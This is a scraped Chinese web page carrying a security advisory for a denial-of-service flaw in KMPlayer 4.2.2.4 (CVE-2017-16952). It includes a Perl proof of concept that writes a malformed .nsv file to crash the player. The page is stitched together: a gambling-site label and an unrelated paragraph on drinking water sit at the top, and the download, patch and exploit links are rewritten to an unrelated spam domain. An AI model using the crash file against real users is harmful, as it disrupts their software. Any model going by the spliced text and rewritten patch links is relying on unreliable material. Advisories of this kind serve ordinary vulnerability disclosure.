今天看啥
    热点:

      天发国际娱乐官网:  一般环境温度高活动水平的人:在一般环境温度下,运动员、农民、军人、矿工、建筑工人、消防队员等身体活动水平较高的人群,在日常工作中有大量的体力活动,都会经出汗而增加水的丢失,要注意额外补充水分,同时需要考虑补充淡盐水。

      KMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952)


      KMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952)


      发布日期:2017-11-28
      更新日期:2018-01-25

      受影响系统:

      KMPlayer KMPlayer 4.2.2.4

      描述:


      BUGTRAQ  ID: 102717
      CVE(CAN) ID: CVE-2017-16952

      KMPlayer是影音全能播放器,是从linux平台移植而来的。

      KMPlayer 4.2.2.4版本处理构造的.nsv文件时在实现上存在安全漏洞,远程攻击者利用此漏洞可造成拒绝服务。

      <*来源:R.Yavari
        *>

      测试方法:


      警 告

      以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

      R.Yavari ()提供了如下测试方法:

      #! /usr/bin/perl
      # Exploit Title: KMPlayer .nsv Denial of Service
      # Date: 2017-11-22
      # Exploit Author: R.Yavari
      # Version: v4.2.2.4
      # Tested on: Windows 10 , Windows 7
      # other version should be affected
      # NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
      # such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
      # CVE-2017-16952
      # http://www.1click-soft.com/tfgjylgw/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
      # (D.P)

      open(code, ">kmplayer.nsv") || die "can't create crash sample.$!";
      binmode(code);
      $data =
      "\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45";
      print code $data;
       
      close(code);

      建议:


      厂商补丁:

      KMPlayer
      --------
      目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

      http://www.1click-soft.com/tfgjylgw/
      http://www.1click-soft.com/tfgjylgw/exploits/43185/

      www.1click-soft.comtruehttp://www.1click-soft.com/xtaq/1303352.htmlTechArticleKMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952) KMPlayer .nsv远程拒绝服务漏洞(CVE-2017-16952) 发布日期:2017-11-28 更新日期:2018-01-25 受影响系统...

      相关文章

      相关搜索: KMPlayer安全漏洞

      帮客评论

      视觉看点
      百度 360 搜狗